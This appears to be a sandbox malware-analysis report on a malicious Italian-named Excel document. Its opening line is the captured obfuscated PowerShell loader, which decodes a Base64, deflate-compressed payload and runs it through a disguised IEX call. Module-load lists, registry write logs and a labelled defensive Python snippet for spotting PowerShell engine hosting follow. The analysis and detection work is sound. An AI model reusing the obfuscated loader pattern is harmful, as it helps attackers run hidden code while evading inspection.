"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" IEX "(' & ((gv ''*MDr*'').naMe[3,11,2]-Join'''') (neW-obJECt syStEM.Io.comPREssioN.deFlATEsTrEaM( [IO.MeMorYstrEAm][cONveRt]::frombAsE64STring( ''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'' ), [io.COmPressioN.CoMpReSSIOnmodE]::DeCoMpReSS )|foReach{ neW-obJECt iO.StreAMREaDeR($_, [SystEM.tEXT.ENCOdinG]::AsCII ) }).REAdtoEND( )')"
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\system32\shfolder.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.drawing\dbfe8642a8ed7b2b103ad28e0c96418a\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\c9b7480fe8ed9de8f2728e543bd52cb2\microsoft.powershell.graphicalhost.ni.dll
c:\windows\assembly\gac_msil\uiautomationtypes\3.0.0.0__31bf3856ad364e35\uiautomationtypes.dll
c:\windows\assembly\gac_msil\uiautomationprovider\3.0.0.0__31bf3856ad364e35\uiautomationprovider.dll
c:\windows\assembly\gac_msil\windowsbase\3.0.0.0__31bf3856ad364e35\windowsbase.dll
c:\windows\assembly\gac_32\presentationcore\3.0.0.0__31bf3856ad364e35\presentationcore.dll
c:\windows\assembly\gac_msil\presentationcffrasterizer\3.0.0.0__31bf3856ad364e35\presentationcffrasterizer.dll
c:\windows\assembly\gac_msil\presentationframework\3.0.0.0__31bf3856ad364e35\presentationframework.dll
c:\windows\assembly\gac_msil\presentationui\3.0.0.0__31bf3856ad364e35\presentationui.dll
c:\windows\assembly\gac_32\system.printing\3.0.0.0__31bf3856ad364e35\system.printing.dll
c:\windows\assembly\gac_msil\reachframework\3.0.0.0__31bf3856ad364e35\reachframework.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\windowsbase\cf293040f3a93afa1ea782487acae816\windowsbase.ni.dll
c:\windows\system32\netutils.dll
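The tail of this module list is the Windows PowerShell engine rather than a native payload: mscorwks.dll is the CLR 2.0 runtime (the v2.0.50727 framework and native-image paths agree), system.management.automation.dll is the PowerShell engine, microsoft.powershell.consolehost.ni.dll is the console host, and the wsman and graphicalhost assemblies come along with it. On Windows 7 SP1 the in-box PowerShell is version 2.0, which has none of the script block logging or AMSI integration of later versions, so module-load telemetry such as Sysmon event ID 7 is the practical way to see this engine being hosted. The Python below is an added example and not part of the report: it applies that logic to (pid, image, module) load events and reports which processes loaded the engine, whether the host image is a normal PowerShell executable, and which CLR runtime it runs on. The PIDs and image paths in the sample are assumptions, since this section does not show which process the list belongs to; the module paths are taken from the list above, with one constructed contrast case in which rundll32.exe loads the engine from the GAC.

```python
# Added example: find processes that host the PowerShell engine in module-load
# telemetry (the shape of Sysmon event ID 7). Not part of the ANY.RUN report.
from collections import defaultdict
from pathlib import PureWindowsPath

# The PowerShell engine assembly and its NGEN native image.
ENGINE_MODULES = {"system.management.automation.dll", "system.management.automation.ni.dll"}
# Images in which the engine is expected; anything else is "unmanaged PowerShell".
EXPECTED_HOSTS = {"powershell.exe", "powershell_ise.exe"}
# The runtime DLL, not the directory, tells which CLR runs: mscoreei.dll from
# v4.0.30319 is only the shim and is loaded even when CLR 2.0 is selected.
RUNTIME_DLLS = {
    "mscorwks.dll": "CLR 2.0 (PowerShell 2.0 era: no script block logging, no AMSI)",
    "clr.dll": "CLR 4.0",
}


def powershell_hosts(events):
    """events: iterable of (pid, image_path, module_path) load records.
    Returns one finding per process that loaded the engine."""
    per_pid = defaultdict(lambda: {"image": None, "modules": set()})
    for pid, image, module in events:
        entry = per_pid[pid]
        entry["image"] = image
        entry["modules"].add(PureWindowsPath(module).name.lower())
    findings = []
    for pid, entry in sorted(per_pid.items()):
        if not entry["modules"] & ENGINE_MODULES:
            continue
        host = PureWindowsPath(entry["image"]).name.lower()
        runtime = next((desc for dll, desc in RUNTIME_DLLS.items() if dll in entry["modules"]), "unknown")
        findings.append({"pid": pid, "host": host,
                         "unexpected_host": host not in EXPECTED_HOSTS, "runtime": runtime})
    return findings


# Constructed sample. PID 1 and its image path are assumptions (this section does
# not show which process the module list belongs to); its module paths are copied
# from the list above. PID 2 is a made-up contrast case: rundll32.exe loading the
# engine from the GAC on CLR 4.0. PID 3 loads no engine and must not be reported.
PS_HOST = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    (1, PS_HOST, r"c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll"),
    (1, PS_HOST, r"c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll"),
    (1, PS_HOST, r"c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll"),
    (1, PS_HOST, r"c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll"),
    (2, r"C:\Windows\System32\rundll32.exe", r"c:\windows\microsoft.net\framework\v4.0.30319\clr.dll"),
    (2, r"C:\Windows\System32\rundll32.exe", r"c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll"),
    (3, r"C:\Windows\System32\notepad.exe", r"c:\windows\system32\kernel32.dll"),
]
```

Run `powershell_hosts(SAMPLE_EVENTS)`: PID 1 comes back as an expected host on CLR 2.0, PID 2 as an unexpected host on CLR 4.0, and PID 3 is not reported. In production the same function takes Sysmon event 7 records keyed by ProcessId and Image; the point of keying on the runtime DLL is that a CLR 2.0 engine leaves no PowerShell-side logs to fall back on.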

Registry activity

Total events: 3067
Read events: 2000
Write events: 1007
Delete events: 60

Modification events

PID | Process | Operation | Key | Name | Value
1160 | EXCEL.EXE | delete key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
1160 | EXCEL.EXE | delete key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency
1160 | EXCEL.EXE | delete key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\E7636
1160 | EXCEL.EXE | delete key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery
1160 | EXCEL.EXE | delete key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\E7915
1160 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Micro
soft\Office\14.0\Excel\Resiliency\StartupItems | 6+5 | 362B350088040000010000000000000000000000
1160 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | 1033 | Off
1160 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | 1033 | On
1160 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel | MTTT | 88040000FCCE67EC57F3D40100000000
1160 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0
1160 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 1
1160 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\E7636 | E7636 | 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
1160 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\E7636 | E7636 | (value on the next line)
04000000880400004000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0044006F00630075006D0065006E0074006F005F003000350039003000320035005F00460054005F00320030003100390030003400310035005F0030003000300035003000300038005F002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C00010000000000000050898EEE57F3D40136760E0036760E0000000000AC020000001800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
1160 | EXCEL.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | EXCELFiles | 1317994519
1160 | EXCEL.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | ProductFiles | 1317994640
1160 | EXCEL.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | VBAFiles | 1317994500
1160 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle | ReviewToken | {C6791793-8604-4AAF-A345-8360A229EAF5}
1160 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\E7636 | E7636 | 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
1160 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\E7915 | E7915 | (value on the next line)
04000000880400004000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0044006F00630075006D0065006E0074006F005F003000350039003000320035005F00460054005F00320030003100390030003400310035005F0030003000300035003000300038005F002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000001000000E08059EC57F3D40115790E0015790E0000000000AC0200006E0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
1160 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU | Max Display | 25
1160 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU | Item 1 | [F00000000][T01D4F357EF0A7010][O00000000]*C:\Users\admin\Desktop\
1160 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU | Max Display | 25
1160 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU | Item 1 | [F00000000][T01D4F357EF0F2B00][O00000000]*C:\Users\admin\Desktop\Documento_059025_FT_20190415_0005008_.xls
1160 | EXCEL.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | ProductFiles | 1317994641
1160 | EXCEL.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | ProductFiles | 1317994642
1160 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel | MTTF | 67
1160 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel | MTTA | 67
3564 | EXCEL.EXE | delete key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
3564 | EXCEL.EXE | delete key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency
3564 | EXCEL.EXE | delete key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\EADE0
3564 | EXCEL.EXE | delete key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery
3564 | EXCEL.EXE | delete key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\EB042
3564 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems | =g/ | 3D672F00EC0D0000010000000000000000000000
3564 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | 1033 | Off
3564 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | 1033 | On
3564 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel | MTTT | EC0D0000F27D9AF657F3D40100000000
3564 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0
3564 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 1
3564 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\EADE0 | EADE0 | (value on the next line)
04000000EC0D00004000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0044006F00630075006D0065006E0074006F005F003000350039003000320035005F00460054005F00320030003100390030003400310035005F0030003000300035003000300038005F002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000000000000F0E90CF757F3D401E0AD0E00E0AD0E0000000000AC020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
3564 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\EADE0 | EADE0 | (value on the next line)
04000000EC0D00004000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0044006F00630075006D0065006E0074006F005F003000350039003000320035005F00460054005F00320030003100390030003400310035005F0030003000300035003000300038005F002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000000000000F0E90CF757F3D401E0AD0E00E0AD0E0000000000AC020000001800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
3564 | EXCEL.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | EXCELFiles | 1317994521
3564 | EXCEL.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | ProductFiles | 1317994643
3564 | EXCEL.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | VBAFiles | 1317994501
3564 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\EADE0 | EADE0 | (value on the next line)
04000000EC0D00004000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0044006F00630075006D0065006E0074006F005F003000350039003000320035005F00460054005F00320030003100390030003400310035005F0030003000300035003000300038005F002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000000000000F0E90CF757F3D401E0AD0E00E0AD0E0000000000AC020000001800000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
3564 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\EB042 | EB042 | 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
3564 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU | Max Display | 25
3564 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU | Item 1 | [F00000000][T01D4F357F76C4800][O00000000]*C:\Users\admin\Desktop\
3564 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU | Max Display | 25
3564 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU | Item 1 | [F00000000][T01D4F357F76E91F0][O00000000]*C:\Users\admin\Desktop\Documento_059025_FT_20190415_0005008_.xls
3564 | EXCEL.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | ProductFiles | 1317994644
3564 | EXCEL.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | ProductFiles | 1317994645
3564 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel | MTTF | 69
3564 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel | MTTA | 69
2720 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x00000409\{38445657-9381-11D6-B41A-00065B83EE53}
2720 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x00000409
2720 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile
2720 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}
2720 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
2720 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410
2720 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
2720 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
2720 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410
2720 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem
2720 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 1
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | LocaleName | it-IT
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iCalendarType | 1
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | s1159 | (blank)
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | s2359 | (blank)
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sTimeFormat | HH:mm:ss
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iTime | 1
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iTLZero | 1
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iTimePrefix | 0
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sTime | :
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sShortDate | dd/MM/yyyy
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iDate | 1
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sDate | /
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sLongDate | dddd d MMMM yyyy
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sYearMonth | MMMM yyyy
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sCurrency | (blank)
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iCurrency | 2
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iNegCurr | 9
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iCurrDigits | 2
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sDecimal | ,
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sMonDecimalSep | ,
